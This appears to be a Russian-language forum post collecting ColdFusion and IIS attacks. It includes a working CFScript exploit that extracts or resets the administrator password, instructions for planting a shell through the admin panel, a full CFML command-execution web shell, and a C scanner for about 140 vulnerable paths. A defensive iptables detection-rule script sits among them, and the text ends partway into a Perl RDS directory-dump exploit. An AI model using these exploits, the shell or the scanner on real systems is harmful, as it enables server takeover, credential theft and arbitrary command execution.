Расскрытие пути Запрашиваем у сервера, работающего под IIS, файл, состоящий из имени MS-DOS-устройства (nul, prn, aux, lpt1) и окончания .dbm Example: Доступ к отладочной информации Дописываем к скрипту ?mode=debug Example: Доступ к админке Если админ не отключил доступ к ColdFusion Administrator с IP-адресов отличающихся от 127.0.0.1, то можно получить доступ к авторизации, ввести надо только лишь пароль. Example: Расскрытие инсталяционного пути в Macromedia ColdFusion MX Запрашиваем /CFIDE/probe.cfm на 8500 порту Example: XSS в Coldfusion Fusebox index.cfm?fuseaction=XSS Example: Раскрытие пароля администратора Уязвимость обнаружена в ColdFusion MX. Удаленный авторизованный пользователь способный создавать ColdFusion шаблоны может получить пароль администратора. Удаленный авторизованный пользователь с привилегиями создавать шаблоны, которые содержат тэги CreateObject и cfobject, может создать шаблон, чтобы получить доступ к паролю администратора. Example: PHP: <cfscript> objFileWriter = CreateObject("java","java.io.FileWriter"); objByteArray = CreateObject("java","java.io.ByteArrayOutputStream"); objJavaC = CreateObject("java","sun.tools.javac.Main"); objString = CreateObject("java","java.lang.String"); objFile = CreateObject("java","java.io.File"); if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; } strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java"; strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar"; strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml"; strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties"; fileWriter = objFileWriter.init("#strJavaSource#",false); fileWriter.write("import coldfusion.security.SecurityManager;"); fileWriter.write("import java.io.File;"); fileWriter.write("public class SecurityExploit extends SecurityManager {"); fileWriter.write("public SecurityExploit(File arg0, File arg1) {"); fileWriter.write("super(arg0, arg1); }"); fileWriter.write("public boolean isAdminSecurityEnabled(){"); fileWriter.write("return false;}}"); fileWriter.flush(); fileWriter.close(); str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#"); strArr = str.split(","); byteArray = objByteArray.init(); compileObj =objJavaC.init(byteArray,str); compileObj.compile(strArr); obj = CreateObject("java","SecurityExploit"); file1 = objFile.init("#strNeoSecFile#"); file2 = objFile.init("#strPasswdFile#"); obj.init(file1,file2); obj.load(); </cfscript> <cfscript> // Get Administrator Password strAdminPw = obj.getAdminPassword(); // Set Administrator Password //obj.setAdminPassword("test123"); // Turn off Sandbox Security //obj.setSandboxSecurityEnabled(false); // Turn off Administrator Login //obj.setAdminSecurityEnabled(false); // Turn off RDS Login //obj.setRdsSecurityEnabled(false); // Set RDS Password //obj.setRdsPassword("test123"); // Turn off JVM Security //obj.setJvmSecurityEnabled(false); </cfscript> <cfoutput>Adminstrator Password: #strAdminPw# </cfoutput> Заливка шелла из админки I. Если на сервере стоит IIS, то заходим на вкладку Server -> Server Settings-> Settings, в Error Template устанавливаем ссылку на шелл, после чего вызываем несуществующую страницу на сервере и он запустится. II. Переходим на вкладку Server ->Automated Tasks-> Schedule Task, нажимаем Add Scheduled Task и вводим имя задачи. Поле Operation должно иметь значение HTTPRequest. В поле URL пишем ссылку на шелл, затем в поле Publish ставим галочку Save output to a file. Указываем путь и имя выходного файла на сервере. Шелл: PHP: < html> < body> < cfoutput> < table> < form method="POST" action="cfexec.cfm"> < tr> < td>Command:</td> < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td> </tr> < tr> < td>Options:</td> < td> < input type=text name="opts" size=50 < cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td> </tr> < tr> < td>Timeout:</td> < td>< input type=text name="timeout" size=4 < cfif isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5" </cfif> > </td> </tr> </table> < input type=submit value="Exec" > </FORM> < cfsavecontent variable="myVar"> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> </cfexecute> </cfsavecontent> < pre> #myVar# </pre> </cfoutput> </body> </html> Буду постепенно добавлять уязвимости в обзор, благо их много
Локальный инклуд Macromedia ColdFusion поставляется с несколькими небольшими "вспомогательными" приложениями, которые, как предполагается, обучают пользователей работать с ColdFusion. Эти приложения не установлены по умолчанию, и Macromedia рекомендует не устанавливать их на рабочий сервер. Некоторые содержат уязвимость, позволяющую нападавшему создавать файлы или выполнять команды на уязвимом сервере. Интересные места Сканеры: PHP: /* CrAzY ScAn by Asmbeginer.com */ /* cc -o crazy crazy.c */ /* ./crazy 127.0.0.1 */ #include <fcntl.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <signal.h> #include <stdio.h> #include <string.h> #include <netdb.h> #include <ctype.h> #include <arpa/nameser.h> #include <sys/stat.h> #include <strings.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> void main(int argc, char *argv[]) { int sock; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char buffer[1024]; int count=0; int ntcheck; char ntbuff[1024]; char *buff[140]; buff[1] = "GET /cfdocs/zero.cfm HTTP/1.0\n\n"; buff[2] = "GET /cfdocs/root.cfm HTTP/1.0\n\n"; buff[3] = "GET /cfdocs/expressions.cfm HTTP/1.0\n\n"; buff[4] = "GET /cfdocs/TOXIC.CFM HTTP/1.0\n\n"; buff[5] = "GET /cfdocs/MOLE.CFM HTTP/1.0\n\n"; buff[6] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n"; buff[7] = "GET /cfdocs/expeval/sendmail.cfm HTTP/1.0\n\n"; buff[8] = "GET /cfdocs/expeval/eval.cfm HTTP/1.0\n\n"; buff[9] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n"; buff[10] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n"; buff[11] = "GET /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\n\n"; buff[12] = "GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini HTTP/1.0\n\n"; buff[13] = "GET /cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.0\n\n"; buff[14] = "GET /cfdocs/exampleapp/email/application.cfm HTTP/1.0\n\n"; buff[15] = "GET /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\n\n"; buff[16] = "GET /cfdocs/examples/parks/detail.cfm HTTP/1.0\n\n"; buff[17] = "GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\n\n"; buff[18] = "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\n\n"; buff[19] = "GET /cfdocs/snippets/viewexample.cfm HTTP/1.0\n\n"; buff[20] = "GET /cfdocs/snippets/gettempdirectory.cfm HTTP/1.0\n\n"; buff[21] = "GET /cfdocs/snippets/fileexists.cfm HTTP/1.0\n\n"; buff[22] = "GET /cfdocs/snippets/evaluate.cfm HTTP/1.0\n\n"; buff[23] = "GET /cfappman/index.cfm HTTP/1.0\n\n"; buff[24] = "GET /cfusion/cfapps/forums/forums_.mdb HTTP/1.0\n\n"; buff[25] = "GET /cfusion/cfapps/security/realm_.mdb HTTP/1.0\n\n"; buff[26] = "GET /cfusion/cfapps/forums/data/forums.mdb HTTP/1.0\n\n"; buff[27] = "GET /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\n\n"; buff[28] = "GET /cfusion/database/cfexamples.mdb HTTP/1.0\n\n"; buff[29] = "GET /cfusion/database/cfsnippets.mdb HTTP/1.0\n\n"; buff[30] = "GET /cfusion/database/smpolicy.mdb HTTP/1.0\n\n"; buff[31] = "GET /cfusion/database/cypress.mdb HTTP/1.0\n\n"; buff[32] = "GET /DataBase/ HTTP/1.0\n\n"; buff[33] = "GET /database.nsf/e1466a8590/6048076233?OpenDocument HTTP/1.0\n\n"; buff[34] = "GET /database.nsf/e146fa8590/6148076233?EditDocument HTTP/1.0\n\n"; buff[35] = "GET /database.nsf/e146fa8590/6148076233?DeleteDocument HTTP/1.0\n\n"; buff[36] = "GET /domcfg.nsf/?open HTTP/1.0\n\n"; buff[37] = "GET /domcfg.nsf/URLRedirect/?OpenForm. HTTP/1.0\n\n"; buff[38] = "GET /domcfg.nsf/ HTTP/1.0\n\n"; buff[39] = "GET /domlog.nsf/ HTTP/1.0\n\n"; buff[40] = "GET /log.nsf/ HTTP/1.0\n\n"; buff[41] = "GET /catalog.nsf/ HTTP/1.0\n\n"; buff[42] = "GET /names.nsf/ HTTP/1.0\n\n"; buff[43] = "GET /database.nsf/ HTTP/1.0\n\n"; buff[44] = "GET /today.nsf/ HTTP/1.0\n\n"; buff[45] = "GET /cgi-bin/cgi-lib.pl HTTP/1.0\n\n"; buff[46] = "GET /cgi-bin/imagemap.c HTTP/1.0\n\n"; buff[47] = "GET /cgi-bin/imagemap.exe HTTP/1.0\n\n"; buff[48] = "GET /cgi-bin/minimal.exe HTTP/1.0\n\n"; buff[49] = "GET /cgi-bin/redir.exe HTTP/1.0\n\n"; buff[50] = "GET /cgi-bin/stats.prg HTTP/1.0\n\n"; buff[51] = "GET /cgi-bin/statsconfig HTTP/1.0\n\n"; buff[52] = "GET /cgi-bin/visadmin.exe HTTP/1.0\n\n"; buff[53] = "GET /cgi-bin/visitor.exe HTTP/1.0\n\n"; buff[54] = "GET /cgi-bin/htmldocs HTTP/1.0\n\n"; buff[55] = "GET /cgi-bin/logs HTTP/1.0\n\n"; buff[56] = "GET /scripts/ HTTP/1.0\n\n"; buff[57] = "GET /Default.asp HTTP/1.0\n\n"; buff[58] = "GET /_vti_bin HTTP/1.0\n\n"; buff[59] = "GET /_vti_bin/_vti_adm HTTP/1.0\n\n"; buff[60] = "GET /_vti_bin/_vti_aut HTTP/1.0\n\n"; buff[61] = "GET /srchadm HTTP/1.0\n\n"; buff[62] = "GET /iisadmin HTTP/1.0\n\n"; buff[63] = "GET /_AuthChangeUrl? HTTP/1.0\n\n"; buff[64] = "GET /_vti_inf.html HTTP/1.0\n\n"; buff[65] = "GET /?PageServices HTTP/1.0\n\n"; buff[66] = "GET /html/?PageServices HTTP/1.0\n\n"; buff[67] = "GET /scripts/cpshost.dll HTTP/1.0\n\n"; buff[68] = "GET /scripts/uploadn.asp HTTP/1.0\n\n"; buff[69] = "GET /scripts/uploadx.asp HTTP/1.0\n\n"; buff[70] = "GET /scripts/upload.asp HTTP/1.0\n\n"; buff[71] = "GET /scripts/repost.asp HTTP/1.0\n\n"; buff[72] = "GET /scripts/postinfo.asp HTTP/1.0\n\n"; buff[73] = "GET /scripts/run.exe HTTP/1.0\n\n"; buff[74] = "GET /scripts/iisadmin/bdir.htr HTTP/1.0\n\n"; buff[75] = "GET /scripts/iisadmin/samples/ctgestb.htx HTTP/1.0\n\n"; buff[76] = "GET /scripts/iisadmin/samples/ctgestb.idc HTTP/1.0\n\n"; buff[77] = "GET /scripts/iisadmin/samples/details.htx HTTP/1.0\n\n"; buff[78] = "GET /scripts/iisadmin/samples/details.idc HTTP/1.0\n\n"; buff[79] = "GET /scripts/iisadmin/samples/query.htx HTTP/1.0\n\n"; buff[80] = "GET /scripts/iisadmin/samples/query.idc HTTP/1.0\n\n"; buff[81] = "GET /scripts/iisadmin/samples/register.htx HTTP/1.0\n\n"; buff[82] = "GET /scripts/iisadmin/samples/register.idc HTTP/1.0\n\n"; buff[83] = "GET /scripts/iisadmin/samples/sample.htx HTTP/1.0\n\n"; buff[84] = "GET /scripts/iisadmin/samples/sample.idc HTTP/1.0\n\n"; buff[85] = "GET /scripts/iisadmin/samples/sample2.htx HTTP/1.0\n\n"; buff[86] = "GET /scripts/iisadmin/samples/viewbook.htx HTTP/1.0\n\n"; buff[87] = "GET /scripts/iisadmin/samples/viewbook.idc HTTP/1.0\n\n"; buff[88] = "GET /scripts/iisadmin/tools/ct.htx HTTP/1.0\n\n"; buff[89] = "GET /scripts/iisadmin/tools/ctss.idc HTTP/1.0\n\n"; buff[90] = "GET /scripts/iisadmin/tools/dsnform.exe HTTP/1.0\n\n"; buff[91] = "GET /scripts/iisadmin/tools/getdrvrs.exe HTTP/1.0\n\n"; buff[92] = "GET /scripts/iisadmin/tools/mkilog.exe HTTP/1.0\n\n"; buff[93] = "GET /scripts/iisadmin/tools/newdsn.exe HTTP/1.0\n\n"; buff[94] = "GET /IISADMPWD/achg.htr HTTP/1.0\n\n"; buff[95] = "GET /IISADMPWD/aexp.htr HTTP/1.0\n\n"; buff[96] = "GET /IISADMPWD/aexp2.htr HTTP/1.0\n\n"; buff[97] = "GET /IISADMPWD/aexp2b.htr HTTP/1.0\n\n"; buff[98] = "GET /IISADMPWD/aexp3.htr HTTP/1.0\n\n"; buff[99] = "GET /IISADMPWD/aexp4.htr HTTP/1.0\n\n"; buff[100] = "GET /IISADMPWD/aexp4b.htr HTTP/1.0\n\n"; buff[101] = "GET /IISADMPWD/anot.htr HTTP/1.0\n\n"; buff[102] = "GET /IISADMPWD/anot3.htr HTTP/1.0\n\n"; buff[103] = "GET /_vti_pvt/writeto.cnf HTTP/1.0\n\n"; buff[104] = "GET /_vti_pvt/svcacl.cnf HTTP/1.0\n\n"; buff[105] = "GET /_vti_pvt/services.cnf HTTP/1.0\n\n"; buff[106] = "GET /_vti_pvt/service.stp HTTP/1.0\n\n"; buff[107] = "GET /_vti_pvt/service.cnf HTTP/1.0\n\n"; buff[108] = "GET /_vti_pvt/access.cnf HTTP/1.0\n\n"; buff[109] = "GET /_private/registrations.txt HTTP/1.0\n\n"; buff[110] = "GET /_private/registrations.htm HTTP/1.0\n\n"; buff[111] = "GET /_private/register.txt HTTP/1.0\n\n"; buff[112] = "GET /_private/register.htm HTTP/1.0\n\n"; buff[113] = "GET /_private/orders.txt HTTP/1.0\n\n"; buff[114] = "GET /_private/orders.htm HTTP/1.0\n\n"; buff[115] = "GET /_private/form_results.htm HTTP/1.0\n\n"; buff[116] = "GET /_private/form_results.txt HTTP/1.0\n\n"; buff[117] = "GET /admisapi/fpadmin.htm HTTP/1.0\n\n"; buff[118] = "GET /scripts/Fpadmcgi.exe HTTP/1.0\n\n"; buff[119] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n"; buff[120] = "GET /_vti_bin/_vti_aut/author.dll HTTP/1.0\n\n"; buff[121] = "GET /_vti_bin/_vti_adm/admin.dll HTTP/1.0\n\n"; buff[122] = "GET /msads/Samples/selector/showcode.asp HTTP/1.0\n\n"; buff[123] = "GET /scripts/perl? HTTP/1.0\n\n"; buff[124] = "GET /scripts/proxy/w3proxy.dll HTTP/1.0\n\n"; buff[125] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n"; buff[126] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n"; buff[127] = "GET /scripts/CGImail.exe HTTP/1.0\n\n"; buff[128] = "GET /AdvWorks/equipment/catalog_type.asp HTTP/1.0\n\n"; buff[129] = "GET /scripts/iisadmin/default.htm HTTP/1.0\n\n"; buff[130] = "GET /msadc/samples/adctest.asp HTTP/1.0\n\n"; buff[131] = "GET /msadc/msadcs.dll HTTP/1.0\n\n"; buff[132] = "GET /adsamples/config/site.csc HTTP/1.0\n\n"; buff[133] = "GET /scripts/../../cmd.exe HTTP/1.0\n\n"; buff[134] = "GET /scripts/cpshost.dll HTTP/1.0\n\n"; buff[135] = "GET /scripts/convert.bas HTTP/1.0\n\n"; buff[136] = "GET .html/...... HTTP/1.0\n\n"; buff[137] = "GET /publisher/ HTTP/1.0\n\n"; buff[138] = "GET ..../Windows/Admin.pwl HTTP/1.0\n\n"; buff[139] = "GET ....../......ida/con HTTP/1.0\n\n"; if (argc>2) { printf("\nusage : %s host ",argv[0]); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } while(count++ < 140) { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } for(ntcheck=0; ntcheck < 1024; ntcheck++) { ntbuff[ntcheck] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock,ntbuff, sizeof(ntbuff),0); close(sock); } }
PHP: #!/bin/bash #Copyright 2003 William Stearns <[email protected]> #Released under the GPL. #ZZZZ Check Me and MyVersion Me='snort-web-coldfusion' MyVersion='20031125' #DefaultActions='' [ -r /etc/firebricks/firebricks.conf ] && . /etc/firebricks/firebricks.conf [ -r /etc/firebricks/$Me.conf ] && . /etc/firebricks/$Me.conf [ -r ${FBLibDir:-'/usr/lib/firebricks/'}/firebrickslib ] && . ${FBLibDir:-'/usr/lib/firebricks/'}/firebrickslib if [ -z "$FBLibVer" ]; then echo 'It looks like firebrickslib was not loaded, why? Exiting' >&2 exit 1 fi for OneTask in $Tasks ; do case "$OneTask" in link) $IptablesBin -N $Me >/dev/null 2>&1 #ZZZZ try to restrict the following three to only send down what the chain needs to inspect. $IptablesBin $AppIn INPUT -i \! lo -j $Me $IptablesBin $AppIn FORWARD -j $Me $IptablesBin $AppIn OUTPUT -j $Me ;; unlink) #ZZZZ Make the same changes as above (such as "-p tcp"), but if you cut and paste, note "$AppIn" is now "-D" $IptablesBin -D INPUT -i \! lo -j $Me $IptablesBin -D FORWARD -j $Me $IptablesBin -D OUTPUT -j $Me $IptablesBin -X $Me >/dev/null 2>&1 ;; create) echo "Starting $Me" >&2 FlushOrNewChain $Me LogAs="SID903" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfcache.map"' $Tail # '"WEB-COLDFUSION cfcache.map access"' nocase-ignored bugtraq,917 cve,CVE-2000-0057 classtype:attempted-recon sid:903 LogAs="SID904" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/email/application.cfm"' $Tail # '"WEB-COLDFUSION exampleapp application.cfm"' nocase-ignored bugtraq,1021 classtype:attempted-recon sid:904 LogAs="SID905" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/publish/admin/application.cfm"' $Tail # '"WEB-COLDFUSION application.cfm access"' nocase-ignored bugtraq,1021 classtype:attempted-recon sid:905 LogAs="SID906" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/email/getfile.cfm"' $Tail # '"WEB-COLDFUSION getfile.cfm access"' nocase-ignored bugtraq,229 classtype:attempted-recon sid:906 LogAs="SID907" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/publish/admin/addcontent.cfm"' $Tail # '"WEB-COLDFUSION addcontent.cfm access"' nocase-ignored classtype:attempted-recon sid:907 LogAs="SID908" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfide/administrator/index.cfm"' $Tail # '"WEB-COLDFUSION administrator access"' nocase-ignored cve,CVE-2000-0538 classtype:attempted-recon sid:908 LogAs="SID909" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_SETDATASOURCEUSERNAME()"' $Tail # '"WEB-COLDFUSION datasource username attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:909 LogAs="SID910" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/fileexists.cfm"' $Tail # '"WEB-COLDFUSION fileexists.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:910 LogAs="SID911" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/exprcalc.cfm"' $Tail # '"WEB-COLDFUSION exprcalc access"' nocase-ignored cve,CVE-1999-0455 bugtraq,550 classtype:attempted-recon sid:911 LogAs="SID912" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/parks/detail.cfm"' $Tail # '"WEB-COLDFUSION parks access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:912 LogAs="SID913" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfappman/index.cfm"' $Tail # '"WEB-COLDFUSION cfappman access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:913 LogAs="SID914" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/cvbeans/beaninfo.cfm"' $Tail # '"WEB-COLDFUSION beaninfo access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:914 LogAs="SID915" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/evaluate.cfm"' $Tail # '"WEB-COLDFUSION evaluate.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:915 LogAs="SID916" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_GETODBCDSN()"' $Tail # '"WEB-COLDFUSION getodbcdsn access"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:916 LogAs="SID917" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_DBCONNECTIONS_FLUSH()"' $Tail # '"WEB-COLDFUSION db connections flush attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:917 LogAs="SID918" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/"' $Tail # '"WEB-COLDFUSION expeval access"' nocase-ignored bugtraq,550 cve,CAN-1999-0477 classtype:attempted-user sid:918 LogAs="SID919" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_SETDATASOURCEPASSWORD()"' $Tail # '"WEB-COLDFUSION datasource passwordattempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:919 LogAs="SID920" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CF_ISCOLDFUSIONDATASOURCE()"' $Tail # '"WEB-COLDFUSION datasource attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:920 LogAs="SID921" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_ENCRYPT()"' $Tail # '"WEB-COLDFUSION admin encrypt attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:921 LogAs="SID922" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/expeval/displayopenedfile.cfm"' $Tail # '"WEB-COLDFUSION displayfile access"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:922 LogAs="SID923" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_GETODBCINI()"' $Tail # '"WEB-COLDFUSION getodbcin attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:923 LogAs="SID924" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_DECRYPT()"' $Tail # '"WEB-COLDFUSION admin decrypt attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:924 LogAs="SID925" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/examples/mainframeset.cfm"' $Tail # '"WEB-COLDFUSION mainframeset access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:925 LogAs="SID926" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_SETODBCINI()"' $Tail # '"WEB-COLDFUSION set odbc ini attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:926 LogAs="SID927" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_SETTINGS_REFRESH()"' $Tail # '"WEB-COLDFUSION settings refresh attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:927 LogAs="SID928" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/"' $Tail # '"WEB-COLDFUSION exampleapp access"' nocase-ignored classtype:attempted-recon sid:928 LogAs="SID929" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_VERIFYMAIL()"' $Tail # '"WEB-COLDFUSION CFUSION_VERIFYMAIL access"' nocase-ignored bugtraq,550 classtype:attempted-user sid:929 LogAs="SID930" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/"' $Tail # '"WEB-COLDFUSION snippets attempt"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:930 LogAs="SID931" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/cfmlsyntaxcheck.cfm"' $Tail # '"WEB-COLDFUSION cfmlsyntaxcheck.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:931 LogAs="SID932" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/application.cfm"' $Tail # '"WEB-COLDFUSION application.cfm access"' nocase-ignored bugtraq,550 arachnids,268 cve,CAN-2000-0189 classtype:attempted-recon sid:932 LogAs="SID933" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/onrequestend.cfm"' $Tail # '"WEB-COLDFUSION onrequestend.cfm access"' nocase-ignored bugtraq,550 arachnids,269 cve,CAN-2000-0189 classtype:attempted-recon sid:933 LogAs="SID935" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfide/administrator/startstop.html"' $Tail # '"WEB-COLDFUSION startstop DOS access"' nocase-ignored bugtraq,247 classtype:web-application-attack sid:935 LogAs="SID936" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/gettempdirectory.cfm"' $Tail # '"WEB-COLDFUSION gettempdirectory.cfm access "' nocase-ignored bugtraq,550 classtype:attempted-recon sid:936 LogAs="SID1659" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/sendmail.cfm"' $Tail # '"WEB-COLDFUSION sendmail.cfm access"' nocase-ignored classtype:attempted-recon sid:1659 LogAs="SID1540" $Ipt -A $Me -p tcp --dport 80 -m string --string '"Mode=debug"' $Tail # '"WEB-COLDFUSION ?Mode=debug attempt"' nocase-ignored classtype:web-application-activity sid:1540 ;; destroy) echo "Stopping $Me" >&2 DestroyChain $Me ;; renamechain) TempChain="$Me-$RANDOM" echo "Replacing existing rules in $Me with new rules" >&2 $IptablesBin -E $Me $TempChain ;; replacelinks) if [ -z "$TempChain" ]; then echo "No temporary chain to relink in $Me replacelinks, replace operation incomplete." >&2 elif ! $IptablesBin -L $Me -n >/dev/null 2>&1 ; then echo "No $Me chain in $Me, replace operation incomplete." >&2 elif ! $IptablesBin -L $TempChain -n >/dev/null 2>&1 ; then echo "No $TempChain chain in $Me, replace operation incomplete." >&2 elif [ "`$IptablesBin -L INPUT -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then echo "Too few/many references to $TempChain in INPUT in $Me replacelinks, replace operation incomplete." >&2 elif [ "`$IptablesBin -L FORWARD -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then echo "Too few/many references to $TempChain in FORWARD in $Me replacelinks, replace operation incomplete." >&2 elif [ "`$IptablesBin -L OUTPUT -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then echo "Too few/many references to $TempChain in OUTPUT in $Me replacelinks, replace operation incomplete." >&2 else #ZZZZ Place the same criteria you used in link/unlink above in the following three lines. #ZZZZ Criteria should go just in front of "-j $Me" $IptablesBin -R INPUT `$IptablesBin -L INPUT -n --line-numbers | grep $TempChain | awk '{print $1}'` -i \! lo -j $Me $IptablesBin -R FORWARD `$IptablesBin -L FORWARD -n --line-numbers | grep $TempChain | awk '{print $1}'` -j $Me $IptablesBin -R OUTPUT `$IptablesBin -L OUTPUT -n --line-numbers | grep $TempChain | awk '{print $1}'` -j $Me DestroyChain $TempChain unset TempChain fi ;; status) if $IptablesBin -L $Me -n >/dev/null 2>&1 ; then echo "$Me created" >&2 else echo "$Me destroyed" >&2 fi ;; version) echo "$Me $MyVersion, firebrickslib $FBLibVer" >&2 ;; help) DefaultHelp #ZZZZ Please change the text to appropriate help text for this module. You should #ZZZZ cover what the module does, if it's generally safe to use, and under what #ZZZZ conditions it should not be used. Please replace the lines between the two #ZZZZ EOTEXT lines with your own. cat <<EOTEXT >&2 The $Me module puts in some blocks for fragmented icmp packets (illegal) and address mask and timestamp requests and replies. At best, these are uncommon and are used in network mapping. These rules should be safe to use on any network. EOTEXT ;; *) echo "Unknown action $Action in $Me, no action taken." >&2 ;; esac done
XSS в СoldFusion 5.0 Администратор coldfusion может просматривать журнал приложений через Web браузер. Уязвимость позволяет атакующему записать произвольный Javascript код в application log, который будет выполнен при просмотре журнала администратором. Вот часть уязвимого кода: если функция INT сталкивается с не числовым значением, она выдает ошибку и пишет значение в журнал регистрации приложений. Если url.productid содержит что-то типа такого: то при просмотре application log атакующий может похитить куки администратора, в которых хранится пароль в зашифрованном виде. Переполнение буфера в Macromedia ColdFusion jrun.dll, приводящее к DoS'у IIS Переполнение буфера обнаружено в ColdFusion MX server, когда он используется вместе с Microsoft IIS. При получении HTTP-заголовка, превышающего 4096 байт, и если template filename больше 8092 байт, произойдет переполнение в модуле 'jrun.dll'. Успешное использование баги может приводить к зависанию IIS и возможному выполнению произвольного кода. ColdFusion MX Remote Development Service Exploit PHP: #!/usr/bin/perl # RDS_c_Dump.pl # By angry packet ## # THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY # # ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need # to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection, # in like one full HTTP1/1 session witin netcat. # # I would like to point out that the ASPSESSID never validates so you can change this on the fly. # # Due to certian current situations I am not allowed to release full exploit code with # ( READ, RETRIEVE, WRITE ) functions. # # Sample output: # -------------------------------- # Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl # # POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1 # # Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: # Content-Length: 37 # Please wait.. .. # HTTP/1.1 100 Continue # Server: Microsoft-IIS/5.0 # Date: Tue, 01 